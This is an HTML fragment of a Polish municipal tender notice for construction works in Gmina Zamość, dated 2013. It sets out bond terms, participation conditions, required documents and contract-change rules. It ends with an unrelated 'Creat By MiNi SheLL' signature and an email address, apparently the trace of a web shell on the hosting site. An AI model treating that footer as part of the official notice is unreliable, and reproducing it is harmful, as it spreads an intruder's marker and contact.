Jeżeli Wykonawca, którego oferta została wybrana nie wniesie zabezpieczenia należytego wykonania umowy, Zamawiający może wybrać najkorzystniejsza ofertę spośród pozostałych ofert stosownie do treści art. 94 ust. 3 ustawy Pzp, chyba że zachodzą przesłanki, o których mowa w art. 93 ust. 1 ustawy Pzp.
Do zmiany formy zabezpieczenia umowy w trakcie realizacji umowy stosuje się art. 149 ustawy Pzp.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.
Zamawiający w terminie trzech dni roboczych od otrzymania stosownego dokumentu (gwarancji, poręczenia) ma prawo zgłosić do niego zastrzeżenia lub potwierdzić przyjęcie dokumentu bez zastrzeżeń. Wykonawca winien wnieść Zamawiającemu stosowny dokument w terminie umożliwiającym Zamawiającemu wykonanie tego prawa. Nie zgłoszenie zastrzeżeń w terminie trzech dni roboczych od otrzymania dokumentu uważane będzie za przyjecie dokumentu bez zastrzeżeń.
Zwrot zabezpieczenia należytego wykonania umowy
Zamawiający zwróci 70% wysokości zabezpieczenia w terminie 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane - roboty będące przedmiotem zamówienia .
Zamawiający pozostawi na zabezpieczenie roszczeń z tytułu rękojmi za wady kwotę wynoszącą 30% wysokości zabezpieczenia.
Kwota, o której mowa w pkt. 15 jest zwracana nie później niż w 15 dni po upływie okresu rękojmi za wady.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Należy złożyć załącznik nr 6a</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; 

b.1.  Dowodami o których mowa w pkt. 5.5 b są:
1) poświadczenia, lub  inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.

b.2. Zamawiający wymaga, by Wykonawca załączył do oferty co najmniej 2 poświadczenia potwierdzające, że co najmniej 2 roboty budowlane polegające na budowie, przebudowie lub remoncie, której wartość wynosiła minimum 2 000 000,  00 zł brutto, zostały wykonane w sposób należyty oraz wskazująca, że została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona.

b.3 Wykonawca, w miejsce poświadczenia, o których mowa w pkt. 5.5 b.2.SIWZ., może przedkładać  inne dokumenty potwierdzające należyte wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowych warunków w tym zakresie, art. 22 ust.1 ustawy pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dołączy wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi,- kierownik budowy-branży budowlanej, elektrycznej, sanitarnej -   wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; 

Wykonawca dołączy wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za  kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; 
Warunek zostanie spełniony, jeżeli Wykonawca dołączy dokument, zał Nr  6 do  niniejszej SIWZ 
oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
zał Nr 6 a do niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca dołączy opłaconą polisę, a w przypadku jej braku, innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, w wysokości  co najmniej zł brutto 2 000 000,00 zł. 

 Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania przedmiotu zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.

 Wykonawcy, którzy nie wykażą spełniania wymaganych warunków zostaną wykluczeni z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy
2. Przedmiar robót
3. W stosunku do osób fizycznych ( m. in. prowadzących działalność gospodarczą, wspólników spółki cywilnej) oświadczenie w zakresie art. 24 ust. 1 pkt. 2 ustawy Prawo zamówień publicznych, wg wzoru załącznik nr 8 do SIWZ-jeżeli dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ogólne warunki umowy na jakich Zamawiający zamierza zawrzeć umowę z wybranym Wykonawcą zawarte są w projekcje umowy stanowiącym załącznik do niniejszej siwz.
Zamawiający na podstawie art. 144 ust.1 ustawy Prawo zamówień publicznych przewiduje możliwość zmiany zawartej umowy w następujących przypadkach :
1) zmiana osób wyznaczonych do pełnienia funkcji, jak też powołania nowych, w przypadku:
śmierci,
rozwiązania stosunku pracy,
utraty uprawnień niezbędnych do wykonania funkcji w ramach niniejszego zamówienia,
choroby powyżej 14 dni potwierdzonej zaświadczeniem lekarskim,
innych zdarzeń losowych zaistniałych z przyczyn niezależnych od Zamawiającego oraz Wykonawcy, skutkujących obiektywną niemożliwością pełnienia funkcji przez daną osobę, wynikających z okoliczności, których mimo zachowania należytej staranności nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego.
Zmiana osób wyznaczonych do pełnienia funkcji, jak też powołanie nowych, będzie możliwe na uzasadniony obiektywnymi okolicznościami wniosek Wykonawcy po zaakceptowaniu przez Zamawiającego kandydatury innej osoby spełniającej warunki zawarte w SIWZ, co oznacza, że kwalifikacje nowo wprowadzonych osób muszą być takie same albo wyższe od kwalifikacji personelu wykazanego w ofercie.
Wniosek, o którym mowa w zdaniu powyżej, Wykonawca przedkłada Zamawiającemu.
2) zmiana podwykonawcy lub rezygnacja z udziału podwykonawcy przy realizacji przedmiotu zamówienia.
Zmiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji umowy.
Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach, którego Wykonawca opierał się wykazując spełnienie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem że nowy podwykonawca wykaże spełnienie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowego podwykonawcę.
3) zmiana terminów realizacji umowy w następujących sytuacjach:
a) w przypadku, gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, 
b) jeżeli zmiana terminów realizacji umowy jest konieczna z powodu działania siły wyższej tj., niezwykłych i nieprzewidzianych okoliczności niezależnych od strony, która się na nie powołuje i których konsekwencji mimo zachowania należytej staranności nie można było przewidzieć przed wszczęciem postępowania o udzielenie zamówienia publicznego.
Pod pojęciem siły wyższej na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne:
o charakterze niezależnym od stron, którego nie można było przewidzieć na etapie postępowania o udzielenie zamówienia, którego nie można uniknąć ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności.
Za siłę wyższą  warunkującą zmianę umowy uważać się będzie w szczególności:
powódź,
silne wiatry, obfite opady atmosferyczne, ekstremalny upał lub mróz, nietypowe dla obszaru, na którym realizowany jest przedmiot umowy, szczególnie w dłuższym okresie, na podstawie prowadzonego Wykonawcę dziennika pogody,
inne zdarzenia związane z działaniem sił natury, nietypowe dla tego obszaru.
4) inne zmiany niż wymienione w pkt. 1-3 w następujących sytuacjach:
a) zmiany dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, numerów kont bankowych oraz innych danych identyfikacyjnych,
b) dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie ani na wynik postępowania o udzielenie zamówienia publicznego.
c) nieprzewidzianych niekorzystnych warunków gruntowych;
d) nieprzewidzianych niekorzystnych warunków atmosferycznych;
e)zmiany zakresu robót w trakcie realizacji inwestycji;
f)zmiany w projekcie;
g)zmiany warunków finansowania
h) zmiany technologiczne
i) zmiany terminów zakończenia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugzamosc,bip.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zamość, ul. Peowiaków 92,22-400 Zamość, pokój nr 23, II piętro- po wcześniejszym zamówieniu telefonicznym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2013 godzina 08:45, miejsce: Biuro  Obsługi Interesanta, stanowisko nr.1
Oferty zostaną otwarte w siedzibie zamawiającego w świetlicy II piętro w dniu 11/09/2013 r. o godz. 09:00 czasu lokalnego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com